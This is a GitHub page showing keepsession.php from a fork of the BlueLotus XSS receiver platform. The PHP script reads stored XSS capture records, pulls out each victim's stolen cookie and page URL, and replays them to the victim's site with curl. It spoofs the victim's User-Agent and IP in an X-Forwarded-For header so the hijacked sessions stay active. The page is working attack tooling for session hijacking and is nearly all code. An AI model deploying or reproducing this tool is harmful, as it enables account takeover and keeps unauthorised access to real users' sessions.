forked from 02bx/BlueLotus_XSSReceiver
-
Notifications
You must be signed in to change notification settings - Fork 370
/
keepsession.php
102 lines (83 loc) · 4.2 KB
/
keepsession.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
<?php
define("IN_XSS_PLATFORM", true);
ignore_user_abort();
//Windows平台最好别设成0,因为windows上lock没法实现非阻塞
set_time_limit(0);
require_once("load.php");
require_once("functions.php");
require_once("dio.php");
if (KEEP_SESSION) {
//利用非阻塞的flock实现单例运行
$pid = fopen(DATA_PATH . '/check.pid', "w");
if (!$pid)
exit();
if (flock($pid, LOCK_EX | LOCK_NB)) {
$files = glob(DATA_PATH . '/*.php');
foreach ($files as $file) {
$filename = basename($file, ".php");
$info = load_xss_record($filename);
if ($info['keepsession'] === true) {
$url = getLocation($info);
$cookie = getCookie($info);
$useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2535.0 Safari/537.36";
if (isset($info['headers_data']['User-Agent']))
$useragent = $info['headers_data']['User-Agent'];
$ip = $info['user_IP'];
if ($url != "" && $cookie != "") {
$ch = curl_init();
$header[] = 'User-Agent: ' . $useragent;
$header[] = 'Cookie: ' . $cookie;
$header[] = 'X-Forwarded-For: ' . $ip;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
//https不校验证书,按需开启吧
//curl_setopt ( $curl_handle, CURLOPT_SSL_VERIFYHOST, 0 );
curl_exec($ch);
curl_close($ch);
}
}
}
//可加上sleep来防止keepsession被ddos
//sleep(10);
flock($pid, LOCK_UN);
}
fclose($pid);
}
function getCookie($info)
{
$cookie = "";
if (isset($info['decoded_get_data']['cookie']) && $info['decoded_get_data']['cookie'] != "")
$cookie = $info['decoded_get_data']['cookie'];
else if (isset($info['get_data']['cookie']) && $info['get_data']['cookie'] != "")
$cookie = $info['get_data']['cookie'];
else if (isset($info['decoded_post_data']['cookie']) && $info['decoded_post_data']['cookie'] != "")
$cookie = $info['decoded_post_data']['cookie'];
else if (isset($info['post_data']['cookie']) && $info['post_data']['cookie'] != "")
$cookie = $info['post_data']['cookie'];
else if (isset($info['decoded_cookie_data']['cookie']) && $info['decoded_cookie_data']['cookie'] != "")
$cookie = $info['decoded_cookie_data']['cookie'];
else if (isset($info['cookie_data']['cookie']) && $info['cookie_data']['cookie'] != "")
$cookie = $info['cookie_data']['cookie'];
return htmlspecialchars_decode($cookie, ENT_QUOTES);
}
function getLocation($info)
{
$location = "";
if (isset($info['decoded_get_data']['location']) && $info['decoded_get_data']['location'] != "")
$location = $info['decoded_get_data']['location'];
else if (isset($info['get_data']['location']) && $info['get_data']['location'] != "")
$location = $info['get_data']['location'];
else if (isset($info['decoded_post_data']['location']) && $info['decoded_post_data']['location'] != "")
$location = $info['decoded_post_data']['location'];
else if (isset($info['post_data']['location']) && $info['post_data']['location'] != "")
$location = $info['post_data']['location'];
else if (isset($info['decoded_cookie_data']['location']) && $info['decoded_cookie_data']['location'] != "")
$location = $info['decoded_cookie_data']['location'];
else if (isset($info['cookie_data']['location']) && $info['cookie_data']['location'] != "")
$location = $info['cookie_data']['location'];
else if (isset($info['headers_data']['Referer']) && $info['headers_data']['Referer'] != "")
$location = $info['headers_data']['Referer'];
return htmlspecialchars_decode($location, ENT_QUOTES);
}